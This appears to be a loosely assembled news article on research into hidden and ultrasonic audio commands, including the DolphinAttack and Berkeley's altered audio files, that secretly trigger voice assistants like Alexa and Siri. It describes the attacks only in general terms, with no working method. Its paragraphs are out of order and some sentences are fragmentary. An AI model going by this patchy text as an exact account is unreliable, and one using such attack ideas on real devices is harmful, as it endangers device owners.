Alexa and Siri can hear this hidden command. You can't.

Tap Settings

Tap Settings

The researchers say it's likely that bad actors are already carrying out these attacks on people's voice-activated devices.

Voice assistant technology used in Amazon Alexa and Apple's Siri is growing in popularity. They embedded the commands inside normal audio, like recorded speech or even music. They've used it to instruct smart devices to visit malicious sites, initiate calls, click pictures and send messages.

Pictured, a graphic explains how the stealthy attack works.

Apple said its smart speaker, HomePod, is created to prevent commands from doing things like unlocking doors; it noted that iPhones and iPads must be unlocked before Siri will act on commands that access sensitive data or open apps and websites, among other measures. While you might think you're listening to an audiobook or a piece of classical music, your smart speaker could be receiving a litany of commands telling it to change its settings or purchase items from your Amazon account. This means attackers could leverage this vulnerability to use voice-enabled smart devices, such as Amazon Echo, Apple HomePod, or Google Home speakers, apart from smartphones, without making users aware of the backdoor access. In addition, researchers at Princeton and China's Zhejiang University have demonstrated what they are calling the "DolphinAttack". "We want to demonstrate that it's possible, and then hope that other people will say "OK, this is possible, now let's try and fix it".

Earlier this month, researchers at the University of California at Berkley published a research paper that moved the needle even further. The researchers were able to secretly activate the three AI assistants, making them dial phone numbers or open websites. Or that Google just this week announced more native control over kitchen appliances and a strikingly human sounding AI that can make calls on your behalf to set up appointments.

More news: Guardiola blasts Premier League over winners' medal rule

The team were able to launch attacks, which are higher than 20kHz, by using less than £2.20 ($3) of equipment which was attached to a Galaxy S6 Edge.

Researchers tested Apple iPhone models from iPhone 4s to iPhone 7 Plus, Apple watch, Apple iPad mini 4, Apple MacBook, LG Nexus 5X, Asus Nexus 7, Samsung Galaxy S6 edge, Huawei Honor 7, Lenovo ThinkPad T440p, Amazon Echo and Audi Q3. Speech-recognition systems typically translate each sound to a letter, and compile these into words and phrases.

Researchers say the fault is due to both software and hardware issues.

By making slight changes to audio files, researchers were able to cancel out the sound that the speech-recognition system was supposed to hear and replace it with a sound that would be transcribed differently by machines while being almost undetectable to the human ear. It is also an area where laws have to catch up, as there is very little legislation on sending subliminal messages to humans and no such laws against sending those inaudible commands to other people's machines.

Latest News